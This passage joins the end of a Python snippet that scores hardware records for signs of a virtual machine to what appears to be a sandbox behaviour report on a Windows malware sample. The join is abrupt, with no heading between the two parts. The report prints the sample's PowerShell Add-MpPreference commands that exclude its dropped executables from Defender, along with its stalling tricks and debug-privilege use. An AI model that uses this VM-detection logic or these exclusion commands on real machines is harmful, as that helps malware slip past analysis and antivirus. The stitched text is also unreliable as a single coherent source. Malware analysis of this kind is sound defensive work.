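
# Constructed records. VBOX_HOST uses the strings a stock VirtualBox guest
# reports; PHYSICAL_HOST is an invented laptop.
VBOX_HOST = {
    "Win32_BaseBoard": {"Manufacturer": "Oracle Corporation", "Product": "VirtualBox"},
    "Win32_BIOS": {"Manufacturer": "innotek GmbH", "SerialNumber": "0",
                   "Version": "VBOX   - 1"},
    "Win32_ComputerSystem": {"Manufacturer": "innotek GmbH", "Model": "VirtualBox",
                             "TotalPhysicalMemory": 2 * 1024 ** 3},
    "Win32_Processor": {"Name": "Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz",
                        "NumberOfCores": 1},
    "VolumeFullSizeBytes": 40 * 1024 ** 3,
}
PHYSICAL_HOST = {
    "Win32_BaseBoard": {"Manufacturer": "Dell Inc.", "Product": "0ABC12"},
    "Win32_BIOS": {"Manufacturer": "Dell Inc.", "SerialNumber": "ABC1234",
                   "Version": "1.21.0"},
    "Win32_ComputerSystem": {"Manufacturer": "Dell Inc.", "Model": "Latitude 7420",
                             "TotalPhysicalMemory": 16 * 1024 ** 3},
    "Win32_Processor": {"Name": "11th Gen Intel(R) Core(TM) i7-1185G7 @ 3.00GHz",
                        "NumberOfCores": 4},
    "VolumeFullSizeBytes": 512 * 1024 ** 3,
}

if __name__ == "__main__":
    for name, host in (("VBOX_HOST", VBOX_HOST), ("PHYSICAL_HOST", PHYSICAL_HOST)):
        print(name, looks_virtual(host), vm_indicators(host))
```

On a real Windows host the four dictionaries would come from `Get-CimInstance Win32_BaseBoard` and friends. For defenders the useful reading is the inverse: every field this function inspects is one a detonation VM has to spoof (vendor strings, core count, RAM, volume size) before a sample like this one will proceed past its checks.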
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 30000
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 600000
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 599871
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 599765
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 599655
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 598696
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 3600000
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 598586
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 598125
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 597500
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 596828
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 596344
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 595891
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 595406
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 595109
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 594781
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 594516
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 594234
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 593859
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 593516
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 593172
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 592859
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 592437
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 592172
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 591781
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 591437
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 591109
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 590640
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 590422
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 590094
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 589562
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 589109
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 588719
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 588266
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 587750
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 587250
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 586672
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 586250
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 585922
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 585469
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 585062
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 584547
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 584171
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583969
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583772
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583564
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583406
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583231
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583050
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 582859
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 582703
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 582536
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 582380
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 582094
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 300000
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 580047
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 579762
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 579547
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 579344
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 579156
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578969
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578810
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578609
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578406
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578226
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578085
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577937
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577734
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577566
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577406
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577219
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577031
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 576797
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 576594
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 576404
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 576219
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575968
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575828
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575656
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575437
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575223
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575094
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574984
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574866
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574731
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574622
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574514
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574406
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574297
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574187
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574077
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573954
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573810
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573683
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573531
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573418
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573299
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573172
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573062
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 572953
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 572841
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 572734
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user\AppData\Local
Source: w32tm.exe, 0000000E.00000002.1726809984.000002026D769000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe'
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Downloaded Program Files\MoUsoCoreWorker.exe'
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe'
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe'
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Start Menu\Programs\Accessories\csrss.exe'
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe'
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Downloaded Program Files\MoUsoCoreWorker.exe'
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe'
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe'
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Start Menu\Programs\Accessories\csrss.exe'
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe'
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Downloaded Program Files\MoUsoCoreWorker.exe'
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe'
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe'
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Start Menu\Programs\Accessories\csrss.exe'
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\46FAiS0S6O.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe "C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe"
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp, nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerx
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Queries volume information: C:\Users\user\Desktop\fDTPlvsGfH.exe VolumeInformation
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
